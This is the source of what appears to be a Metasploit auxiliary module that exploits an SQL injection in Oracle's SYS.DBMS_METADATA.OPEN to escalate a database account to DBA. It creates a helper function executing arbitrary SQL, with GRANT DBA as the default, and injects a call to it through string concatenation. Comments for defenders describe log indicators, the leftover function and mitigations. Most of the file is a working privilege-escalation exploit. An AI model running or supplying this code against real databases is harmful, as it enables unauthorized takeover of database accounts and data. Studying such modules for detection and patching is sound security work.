Path: blob/master/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for the Oracle SYS.DBMS_METADATA.OPEN SQL injection.
#
# Per its own description, the module escalates an Oracle account to DBA.
# The code does three things against the database it is connected to:
#
#   1. creates a helper function in the DBUSER schema whose body runs the
#      statement held in the SQL option via EXECUTE IMMEDIATE;
#   2. selects sys.dbms_metadata.open with a call to that helper
#      concatenated into the string argument;
#   3. drops the helper, but only on one specific error path (see #run).
#
# Notes for defenders and incident responders:
#   * The module declares IOC_IN_LOGS as a side effect. If statement auditing
#     is enabled, expect to see a CREATE OR REPLACE FUNCTION with a 1-10
#     letter alphabetic name, a SELECT on sys.dbms_metadata.open whose
#     argument contains '|| concatenation, and (with the default SQL option)
#     a GRANT DBA.
#   * The helper function can remain in the schema after a run, because the
#     drop is conditional.
#   * Keeping the database on current vendor patches and withholding
#     CREATE PROCEDURE from accounts that do not need it are the usual
#     mitigations - confirm against the vendor advisory for the release in use.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  # Registers the module metadata and the single SQL option.
  #
  # @param info [Hash] caller-supplied metadata, merged through update_info
  def initialize(info = {})
    metadata = {
      'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN',
      'Description' => %q{
        This module will escalate a Oracle DB user to DBA by exploiting an sql injection
        bug in the SYS.DBMS_METADATA.OPEN package/function.
      },
      'Author' => [ 'MC' ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'URL', 'http://www.metasploit.com' ],
      ],
      'DisclosureDate' => '2008-01-05',
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'Reliability' => []
      }
    }
    super(update_info(info, metadata))

    # Optional statement run by the helper function; the default grants DBA
    # to the DBUSER account.
    default_sql = "GRANT DBA to #{datastore['DBUSER']}"
    register_options(
      [
        OptString.new('SQL', [ false, 'SQL to execute.', default_sql ]),
      ]
    )
  end

  # Sends the helper function, triggers the injection, and drops the helper
  # when the expected ORA-24374 error comes back.
  #
  # check_dependencies and prepare_exec are not defined in this file
  # (presumably they come from the ORACLE mixin - confirm there).
  def run
    return unless check_dependencies

    # Random alphabetic name, 1 to 10 characters long.
    helper = Rex::Text.rand_text_alpha(1..10)
    qualified = "#{datastore['DBUSER']}.#{helper}"

    # Option values are interpolated into the statements as plain text.
    create_stmt = "
      create or replace function #{qualified} return varchar2
      authid current_user is pragma autonomous_transaction;
      begin
      execute immediate '#{datastore['SQL']}';
      return '';
      end;
      "

    inject_stmt = "select sys.dbms_metadata.open('''||#{qualified}()||''') from dual"

    # Unlike the create statement, the drop is not schema-qualified.
    drop_stmt = "drop function #{helper}"

    print_status('Sending function...')
    prepare_exec(create_stmt)

    begin
      print_status('Attempting sql injection on SYS.DBMS_METADATA.OPEN...')
      prepare_exec(inject_stmt)
    rescue ::OCIError => e
      # NOTE(review): every other OCIError is discarded without a message, and
      # neither that path nor an error-free run drops the helper, so the
      # function stays behind in the schema as a forensic artifact.
      if e.to_s.match?(/ORA-24374: define not done before fetch or execute and fetch/)
        print_status("Removing function '#{helper}'...")
        prepare_exec(drop_stmt)
      end
    end
  end
end